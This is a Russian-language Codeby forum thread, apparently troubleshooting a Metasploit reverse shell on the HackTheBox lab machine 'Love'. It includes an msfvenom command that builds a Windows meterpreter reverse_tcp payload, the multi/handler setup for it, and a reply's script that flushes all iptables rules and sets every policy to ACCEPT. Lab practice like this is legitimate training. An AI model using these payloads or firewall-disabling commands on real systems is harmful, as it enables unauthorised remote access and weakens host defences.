• B правой части каждого сообщения есть стрелки и . Не стесняйтесь оценивать ответы. Чтобы автору вопроса закрыть свой тикет, надо выбрать лучший ответ. Просто нажмите значок в правой части сообщения.

  • 🚨 Ещё можно успеть на курс «OSINT: технология боевой разведки» от Академии Кодебай

    🔍 Изучите методы разведки с использованием открытых источников (OSINT) для проведения успешных атак.
    🛠️ Освойте ключевые инструменты, такие как Maltego, TheHarvester и другие.
    🧪 Пройдите практические лабораторные работы, имитирующие реальную разведку.
    🧠 Развивайте навыки, которые помогут вам стать экспертом в области информационной безопасности.

    Запись открыта до 23 мая Подробнее о курсе ...

проблема с metasploit exploit/multi/handler

squadron

New member
31.07.2021
4
0
Доброго времени суток, форумчане. Я столкнулся с проблемой, при пинтесте машины Love на платформе HackTheBox. Суть в том, что мне нужно получить удаленный доступ, через полезную нагрузку и metasploit. Вот как я это делал:
Bash:
msfvenom -p windows/meterpreter/reverse_tcp lport=1234 lhost=[myip] -f exe -o photo.exe
- это я создавал саму полезную нагрузку. После того, как я загрузил ее на атакуемую машину, я запустил слушатель:

Код:
msf6 > use multi/handler
msf6 exploit(multi/handler) > set lhost tun0
msf6 exploit(multi/handler) > set lport 1234
msf6 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > exploit

[*] Started reverse TCP handler on [my_ip]:1234
и после этого, я уже запустил на атакуемой машине саму полезную нагрузку, но, у меня также бесконечная загрузка. Запускал я разными способами, и я уверен, что проблема не в том, что я его не запустил(

Заранее спасибо!
 
1. Попробуй более популярный порт (80, 443 или типа того). Есть вероятность, что исходящее подключение блокирует фаер на таргете.
2. Проверь, что входящее подключение не блокирует фаер на твоём хосте с мсф.
3. Рекомендую в lhost указывать айпишник, а не интерфейс. Последний не всегда корректно отрабатывает.
 
1. Попробуй более популярный порт (80, 443 или типа того). Есть вероятность, что исходящее подключение блокирует фаер на таргете.
2. Проверь, что входящее подключение не блокирует фаер на твоём хосте с мсф.
3. Рекомендую в lhost указывать айпишник, а не интерфейс. Последний не всегда корректно отрабатывает.

а как проверить, не блокирует ли фаер на моём хосте? я новичок, поэтому пока что не очень разбираюсь
 
● nftables.service - nftables
Loaded: loaded (/lib/systemd/system/nftables.service; disabled; vendor pre>
Active: inactive (dead)
Docs: man:nft(8)



вроде выключен

Эта запись свидетельствует о том, что файервол НА ТВОЕМ устройстве не активен и вряд-ли твои проблемы связаны с закрытыми портами.
Но если бы он и был активен, то его настройки легко сбрасываются простым bash-сценарием.
Код:
#!/bin/sh
# Очистка всех цепочек iptables
iptables -F
iptables -X
iptables -t nat -F
iptables -t nat -X
iptables -t mangle -F
iptables -t mangle -X
iptables -P INPUT ACCEPT
iptables -P FORWARD ACCEPT
iptables -P OUTPUT ACCEPT

Код:
echo  "#!/bin/sh
# Очистка всех цепочек iptables
iptables -F
iptables -X
iptables -t nat -F
iptables -t nat -X
iptables -t mangle -F
iptables -t mangle -X
iptables -P INPUT ACCEPT
iptables -P FORWARD ACCEPT
iptables -P OUTPUT ACCEPT" > StopIptables.sh

sudo chmod +x StopIptables.sh

sudo ./StopingIptables.sh
 
Эта запись свидетельствует о том, что файервол НА ТВОЕМ устройстве не активен и вряд-ли твои проблемы связаны с закрытыми портами.
Но если бы он и был активен, то его настройки легко сбрасываются простым bash-сценарием.
Код:
#!/bin/sh
# Очистка всех цепочек iptables
iptables -F
iptables -X
iptables -t nat -F
iptables -t nat -X
iptables -t mangle -F
iptables -t mangle -X
iptables -P INPUT ACCEPT
iptables -P FORWARD ACCEPT
iptables -P OUTPUT ACCEPT

Код:
echo  "#!/bin/sh
# Очистка всех цепочек iptables
iptables -F
iptables -X
iptables -t nat -F
iptables -t nat -X
iptables -t mangle -F
iptables -t mangle -X
iptables -P INPUT ACCEPT
iptables -P FORWARD ACCEPT
iptables -P OUTPUT ACCEPT" > StopIptables.sh

sudo chmod +x StopIptables.sh

sudo ./StopingIptables.sh
спасибо, но так как мой фаервол не активен, то в чем тогда может быть проблема?
 
Мы в соцсетях:

Обучение наступательной кибербезопасности в игровой форме. Начать игру!

Курс AD